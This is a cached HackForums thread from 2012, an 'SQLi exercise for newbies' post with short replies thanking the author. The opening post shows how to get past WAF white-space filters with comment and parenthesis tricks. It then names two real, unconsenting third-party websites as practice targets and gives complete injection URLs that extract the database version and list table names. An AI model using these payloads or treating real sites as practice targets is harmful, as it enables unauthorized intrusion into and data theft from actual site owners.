<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=2884351" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=2884351" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=2884351</a>. It is a snapshot of the page as it appeared on 23 Mar 2014 03:00:04 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=2884351" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:eNg0HHfBbZkJ:www.hackforums.net/showthread.php%3Ftid%3D2884351&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi exercise for newbies] *** White spaces not allowed *** - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi exercise for newbies] *** White spaces not allowed ***"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=2884351"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 03-22-2014, 07:00 PM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/logo_bl.gif" alt="" title="Hack Forums ... Shift+R improves the quality of this image. Shift+A improves the quality of all images on this page."></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><!--//
 <br />

<div class="pm_alert"> &nbsp;</div>
--><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi exercise for newbies] *** White spaces not allowed ***</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=2884351" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/rating.js"></script><div id="success_rating_2884351" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_2884351"><li style="width: 0%" class="current_rating" id="current_rating_2884351">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=2884351&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2884351&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2884351&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2884351&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=2884351&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_2884351" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_2884351_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=2884351" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=2884351&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_2884351");
// -->
</script><div><strong>[SQLi exercise for newbies] *** White spaces not allowed ***</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid26639382" id="pid26639382"></a><table class="tborder" style="border-top-width: 0; " id="post_26639382" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 11:51 AM <span id="edited_by_26639382"><span class="smalltext">(This post was last modified: 09-22-2012 12:01 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26639382#pid26639382">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,159<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26639382">Sometimes
 there is a case when WAF doesn't allow us any white spaces in our 
command. From different tutorials we know how to bypass such situation:<br><br><span style="font-weight: bold;"><span style="color: #00BFFF;">1. adding /**/ or %0A instead of white spaces</span></span><br><br>So instead of<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1,2,3,4,5</code></div></div><br>we use<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>/**/union/**/select/**/1,2,3,4,5</code></div></div><br>or<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>%0Aunion%0Aselect%0A1,2,3,4,5</code></div></div><br><span style="font-weight: bold;"><span style="color: #00BFFF;">2. using ( )</span></span><br><br>Instead of<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union select 1,2,3,4,5</code></div></div><br>we use<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union(select(1),(2),(3),(4),(5))</code></div></div><br>or<br><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>union(select(1),2,3,4,5)</code></div></div><br><span style="color: #32CD32;">As such web pages are not so easy to find <span style="font-size: large;"><span style="font-weight: bold;">here are two web pages for exercising.</span></span> Both don't allow white spaces.</span><br><br><span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-weight: bold;">1. Using link below find version</span></span></span> (related to this <a href="http://www.hackforums.net/showthread.php?tid=2860145" target="_blank">challenge</a>)<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.passion.ru/piknik.php/view/3</code></div></div><br>Try to compose SQLi command to show version.<br><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/56bab577909a9c2a79a4a5fde5293e63.jpg" alt="[Image: 56bab577909a9c2a79a4a5fde5293e63.jpg]" border="0"><br><br>Use
 union select, there are three columns. Vulnerable is column 2. If you 
can't do it click on link below and see solution. Don't cheat <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0"> Try first by yourself. Don't forget: <span style="font-weight: bold;">this is for exercise</span> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Solution:</span></span><br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.passion.ru/piknik.php/view/(-3)union(select(1),version(),3)--</code></div></div></div></div><br><hr><br><span style="color: #00BFFF;"><span style="font-size: large;"><span style="font-weight: bold;">2. Using link below show table names in database</span></span></span><br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sport-shoes.ru/viewitem.php?num=13</code></div></div><br>Try to compose SQLi command to show tables names in database.<br><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/61feb2975cc68e20b3de6bdb78250924.jpg" alt="[Image: 61feb2975cc68e20b3de6bdb78250924.jpg]" border="0"><br><br>Use
 union select. There are 10 columns. Vulnerable are columns 3 and 6. If 
you can't do it click on link below and see solution. Don't cheat <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0"> Try first by yourself. Don't forget: <span style="font-weight: bold;">this is for exercise</span> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/thumbsup.gif" style="vertical-align: middle;" alt="Thumbsup" title="Thumbsup" border="0"><br><br><span style="font-weight: bold;"><span style="color: #FFD700;">Solution:</span></span><br><div><div class="spoiler_header">Spoiler <a href="javascript:void(0);" onclick="javascript:if(parentNode.parentNode.getElementsByTagName('div')[1].style.display=='block'){parentNode.parentNode.getElementsByTagName('div')[1].style.display='none';this.innerHTML='(Click to View)';}else {parentNode.parentNode.getElementsByTagName('div')[1].style.display='block';this.innerHTML='(Click to Hide)';}">(Click to View)</a></div><div class="spoiler_body" style="display: none;"><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>http://www.sport-shoes.ru/viewitem.php?num=(13)and(0)union(select(1),2,version(),4,5,group_concat(table_na
​
me,0x3c62723e),7,8,9,(10)from(information_schema.tables)where(table_schema=datab
​ase()))--+-</code></div></div></div></div><br>Good luck with exercising <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_26639382"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26639382" class="bitButton" rel="nofollow">Quote</a> </div></td></tr></tbody></table><a name="pid26641730" id="pid26641730"></a><table class="tborder" style="margin-top: 5px; " id="post_26641730" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 01:22 PM <span id="edited_by_26641730"><span class="smalltext">(This post was last modified: 09-22-2012 01:23 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1208053">haczord</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26641730#pid26641730">#2</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1208053"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/image.jpg" alt="" height="100" width="86"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1208053"><span class="group2">haczord</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 17<br>Posts: 305<br>Joined: Mar 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1208053"><strong class="reputation_positive">6</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26641730">Nice tutorial.<br>thanks for the tutorial<img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_26641730"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1208053" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26641730" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26642843" id="pid26642843"></a><table class="tborder" style="margin-top: 5px; " id="post_26642843" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 02:09 PM <span id="edited_by_26642843"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26642843#pid26642843">#3</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1460830"><span style="color:#383838">tios1</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 1<br>Posts: 18<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1460830"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26642843">Thanks for this, bookmarked it <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_26642843"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1460830" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a> </div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26642843" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26645669" id="pid26645669"></a><table class="tborder" style="margin-top: 5px; " id="post_26645669" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 04:09 PM <span id="edited_by_26645669"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26645669#pid26645669">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 165<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26645669">Nice tut bro.<br>I always use plus sign (+) instead of white space, in this case (passion.ru)why i cant use it?<br>I tried (3)union(select(1),2), the site dont showany error,so if there are more columns, about 30 column, how do i get it?<br>I mean when iadd (3)union(select(1)), the site dont show any error, how i know my injection are work?</div><div class="post_meta" id="post_meta_26645669"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26645669" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26648254" id="pid26648254"></a><table class="tborder" style="margin-top: 5px; " id="post_26648254" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 06:00 PM <span id="edited_by_26648254"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26648254#pid26648254">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1443577"><span style="color:#383838">Light Yagami.</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Closed Account<br><span class="userstars"></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 62<br>Posts: 1,859<br>Joined: Aug 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1443577"><strong class="reputation_positive">66</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26648254">the best tut on this subject thanks i learned a lot</div><div class="post_meta" id="post_meta_26648254"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1443577" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=2884351&amp;replyto=26648254" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid26649415" id="pid26649415"></a><table class="tborder" style="margin-top: 5px; " id="post_26649415" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">09-22-2012, 06:52 PM <span id="edited_by_26649415"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=2884351&amp;pid=26649415#pid26649415">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=844715"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/48d54ec6cdc99921c8baeb28e7fe50bd_sp.htm" alt="" height="100" width="69"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=844715"><span class="group9">Misaki Tokura</span></a></span></strong> <img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">New Clan:Genesis<br><span class="userstars"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/starl33t.png" alt="*" border="0"><br></span><img src="%5BSQLi%20exercise%20for%20newbies%5D%20%20%20White%20spaces%20not%20allowed%20%20%20-%20Page%201_files/hf_l33t.png" alt="HF l33t" title="HF l33t"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 345<br>Joined: Jun 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=844715"><strong class="reputation_positive">29</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_26649415">Thanks man, really appreciate this. Great for learning</div><div class="post_meta" id="post_meta_26649415"></div></td></tr><tr><td 